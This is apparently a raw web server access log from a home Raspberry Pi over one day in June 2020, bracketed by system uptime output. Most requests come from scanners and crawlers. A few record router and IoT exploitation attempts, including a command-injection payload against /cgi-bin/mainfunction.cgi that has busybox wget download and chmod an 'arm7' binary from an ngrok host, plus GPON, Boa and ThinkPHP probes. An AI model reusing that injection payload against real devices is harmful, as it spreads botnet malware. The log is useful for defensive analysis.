Mon Jun 1 06:25:12 MDT 2020 06:25:12 up 1 day, 11:33, 1 user, load average: 0.49, 0.32, 0.32 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 Sat18 35:38m 55.64s 0.19s /usr/bin/lxsession -s LXDE-pi -e LXDE 202.107.226.2 - - [01/Jun/2020:13:17:54 +0000] "GET / HTTP/1.0" 200 25000 "" "" 103.113.106.13 - - [01/Jun/2020:13:49:42 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 61.219.11.153 - - [01/Jun/2020:14:35:06 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 138.255.193.118 - - [01/Jun/2020:14:42:06 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 162.250.19.7 - - [01/Jun/2020:14:58:13 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 134.19.215.196 - - [01/Jun/2020:15:08:16 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS HTTP/1.1" 400 0 "" "" 134.19.215.196 - - [01/Jun/2020:15:08:17 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 220.233.114.66 - - [01/Jun/2020:15:14:09 +0000] "POST /boaform/admin/formPing HTTP/1.1" 400 0 "" "polaris botnet" 220.233.114.66 - - [01/Jun/2020:15:14:09 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 172.104.108.109 - - [01/Jun/2020:15:22:33 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0" 54.176.11.34 - - [01/Jun/2020:17:16:05 +0000] "UNKNOWN HTTP/1.1" 501 0 "" "" 115.238.44.237 - - [01/Jun/2020:17:19:11 +0000] "GET / HTTP/1.0" 200 25000 "" "" 207.102.21.5 - - [01/Jun/2020:18:08:16 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 0 "" "XTC" 207.102.21.5 - - [01/Jun/2020:18:08:16 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 185.173.35.13 - - [01/Jun/2020:19:06:40 +0000] "GET / HTTP/1.1" 200 25000 "" "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" 201.1.9.133 - - [01/Jun/2020:19:57:02 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 18.144.39.168 - - [01/Jun/2020:21:16:29 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36" 114.215.184.51 - - [01/Jun/2020:21:59:15 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 114.215.184.51 - - [01/Jun/2020:21:59:16 +0000] "GET /TP/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 114.215.184.51 - - [01/Jun/2020:21:59:16 +0000] "GET /TP/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 114.215.184.51 - - [01/Jun/2020:21:59:17 +0000] "GET /thinkphp/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 114.215.184.51 - - [01/Jun/2020:21:59:17 +0000] "GET /html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 114.215.184.51 - - [01/Jun/2020:21:59:18 +0000] "GET /public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 114.215.184.51 - - [01/Jun/2020:21:59:19 +0000] "GET /TP/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 114.215.184.51 - - [01/Jun/2020:21:59:19 +0000] "GET /elrekt.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 114.215.184.51 - - [01/Jun/2020:21:59:20 +0000] "GET /index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 114.215.184.51 - - [01/Jun/2020:21:59:20 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 208.91.109.50 - - [01/Jun/2020:23:56:13 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 208.91.109.50 - - [01/Jun/2020:23:56:13 +0000] "HEAD /robots.txt HTTP/1.0" 200 0 "" "" 188.225.78.198 - - [02/Jun/2020:00:32:03 +0000] "GET /t HTTP/1.1" 404 0 "" "Go-http-client/1.1" 162.250.19.7 - - [02/Jun/2020:02:10:26 +0000] "GET /videos/knight-2020-05-20-underground-prisons-guillotines-banned-video.mp4 HTTP/1.1" 200 306743544 "http://162.250.19.7/videos/" "Mozilla/5.0 (Android 6.0; Tablet; rv:68.0) Gecko/68.0 Firefox/68.0" 162.243.140.245 - - [02/Jun/2020:02:40:50 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 139.162.119.197 - - [02/Jun/2020:02:57:50 +0000] "GET / HTTP/1.1" 200 25000 "" "HTTP Banner Detection (https://security.ipip.net)" 5.189.188.207 - - [02/Jun/2020:04:20:14 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 85.93.121.43 - - [02/Jun/2020:04:21:28 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 128.14.209.242 - - [02/Jun/2020:09:10:27 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 " 113.222.240.217 - - [02/Jun/2020:10:10:46 +0000] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 0 "" "Hello, World" Tue Jun 2 06:25:07 MDT 2020 06:25:08 up 2 days, 11:33, 1 user, load average: 0.50, 0.36, 0.36 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 Sat18 2days 1:30 0.19s /usr/bin/lxsession -s LXDE-pi -e LXDE